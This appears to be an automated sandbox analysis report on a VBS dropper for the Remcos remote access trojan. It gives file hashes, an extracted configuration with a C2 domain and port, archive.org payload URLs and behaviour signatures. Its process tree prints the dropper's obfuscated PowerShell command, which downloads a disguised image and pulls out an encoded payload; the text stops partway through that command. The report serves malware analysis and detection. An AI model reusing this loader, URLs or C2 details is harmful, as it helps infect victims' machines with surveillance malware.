Analysis
-
max time kernel
148s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
28-08-2024 08:31
General
-
Target
sweetnessofcookiesmilkeatingbymewith.vbs
-
Size
179KB
-
MD5
caf64b2016e2f4caf70d865690f7e5e0
-
SHA1
1ff3d5ebda9b1105e684101f201d6ccde03568f8
-
SHA256
5132ba606b767573c897b02e29221c615bcf10c430dc99dd313fa9e12a08b114
-
SHA512
7a5481edd308256d30a6bd8346f9288f7a1290946c12caed7a64479820ece31f444169946543c67ce051ec085e6e31d18cd6af0a2cef8f99f36d57250b311258
-
SSDEEP
3072:fBn3/sPeR6bdgt5prGweSqD2y8LscCV61wAZe:fBP+bTgscCM1wAZe
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
Family
remcos
Botnet
zynova
C2
cloudsave.duckdns.org:14645
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-CJ3HJ1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sweetnessofcookiesmilkeatingbymewith.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBo□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bw□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Og□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQBh□ ⿉ ㋃ ⼏ ⫟Dg□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟z□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟dQBz□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟GM□ ⿉ ㋃ ⼏ ⫟a□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟cgBn□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟3□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBz□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟dgBi□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟LwB2□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bn□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Hc□ ⿉ ㋃ ⼏ ⫟ZQBi□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgB0□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB3□ ⿉ ㋃ ⼏ ⫟C0□ ⿉ ㋃ ⼏ ⫟TwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟VwBl□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟QwBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟B3□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟YgBD□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟aQBl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟bwB3□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BE□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟aQBt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟ZwBl□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBF□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟VQBU□ ⿉ ㋃ ⼏ ⫟EY□ ⿉ ㋃ ⼏ ⫟O□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟By□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bgBn□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟QgB5□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟ZQBz□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟UwBU□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟UgBU□ ⿉ ㋃ ⼏ ⫟D4□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟RQBO□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟+□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟V□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟BP□ ⿉ ㋃ ⼏ ⫟GY□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟Zg□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟RgBs□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bz□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟w□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟r□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟YQBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟Ew□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cgB0□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟UwB1□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟bwBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟RgBy□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟bQBC□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟N□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟cgBp□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ 